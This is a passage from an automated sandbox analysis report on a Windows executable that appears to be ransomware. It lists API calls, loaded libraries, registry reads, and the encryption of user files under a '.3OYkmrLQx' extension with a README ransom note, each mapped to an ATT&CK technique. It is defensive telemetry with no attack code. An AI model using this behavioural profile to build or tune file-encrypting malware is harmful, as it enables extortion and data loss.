00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0700080078f92200@ntdll.dll\"\n \"1300140054f44876@RPCRT4.dll\"\n \"15001600c03ee070@advapi32.dll\"\n \"0e000f00703fe070@advapi32.dll\"\n \"0e000f00cc3fe070@advapi32.dll\"\n \"11001200b447e070@advapi32.dll\"\n \"110012004848e070@advapi32.dll\"\n \"120013008c48e070@advapi32.dll\"\n \"12001300e448e070@advapi32.dll\"\n \"14001500386ee070@advapi32.dll\"\n \"14001500506ee070@advapi32.dll\"\n \"14001500686ee070@advapi32.dll\"\n \"17001800806ee070@advapi32.dll\"\n \"0d000e00986ee070@advapi32.dll\"\n \"11001200a86ee070@advapi32.dll\"\n \"11001200bc6ee070@advapi32.dll\"\n \"0f001000fc6fe070@advapi32.dll\"\n \"140015003c70e070@advapi32.dll\"\n \"140015005470e070@advapi32.dll\"\n \"0c000d009c70e070@advapi32.dll\"\n \"0c000d00ac70e070@advapi32.dll\"\n \"0e000f00bc70e070@advapi32.dll\"\n \"0e000f00cc70e070@advapi32.dll\"\n \"0b000c00dc70e070@advapi32.dll\"\n \"180019001473e070@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-248", "type": 6, "relevance": 2, "name": "Tries to open documents files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opens a file %USERPROFILE%\\Downloads\\0YdED8h4YnKljVf.doc (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opens a file %USERPROFILE%\\Downloads\\1fdX8.pdf (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opens a file %USERPROFILE%\\Downloads\\35ZarnYhqsU.pdf (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opens a file %USERPROFILE%\\Downloads\\3CrsgVxPsB.doc (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" opens a file %USERPROFILE%\\Downloads\\59JuNefogVsL0apf.pdf (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has an executable section named \".text\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has an executable section named \".itext\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has an writable section named \".data\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has an writable section named \".pdata\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on file \"sample.bin\"\n YARA signature for AES encryption matched on process \"00000000-00002940\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"smss.exe,csrss.exe,lsass.exe,wininit.exe,winlogon.exe\" (Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000001.249813.0049A000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\WTSAPI32.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\RSTRTMGR.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\NCRYPT.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\BCRYPT.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\NETAPI32.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\NETUTILS.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\SRVCLI.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\WKSCLI.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\SAMCLI.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\LOGONCLI.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\ACTIVEDS.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\ADSLDPC.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\ATL.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\WSOCK32.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\MPR.DLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\GPEDIT.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn autos.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn money.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\ie add-on site.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\ie site on microsoft.com.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft at work.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\links for united states\\gobiernousa.gov.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\links\\suggested sites.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\favorites\\links\\web slice gallery.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0nmjh6i8.gif.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0yded8h4ynkljvf.doc.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\downloads\\10ybabsxu.mp3.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" reads file \"c:\\users\\%osuser%\\downloads\\2huxjyfppkjp.avi.3oykmrlqx\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\pluginreg.dat.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Preferences\\defaultHeuristics.dat.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\%OSUSER%-PC-20171203-1827b.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\%OSUSER%-PC-20171204-1724.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\JavaDeployReg.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jusched.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_000_core_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_001_dev_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_002_exe_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_003_lib_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_004_test_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_005_doc_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_006_tools_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\outlook logging\\firstrun.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Low\\JavaDeployReg.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Adobe_ADMLogs\\Adobe_ADM.log.3OYkmrLQx\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA\\ACCESSPROVIDERS\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\ntmarta.dll\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Windows\\system32\\ntmarta.dll\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"\\Device\\HarddiskVolume2\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\3OYkmrLQx.README.txt\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"\\Device\\HarddiskVolume2\\Users\\%OSUSER%\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Videos\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Searches\"\n 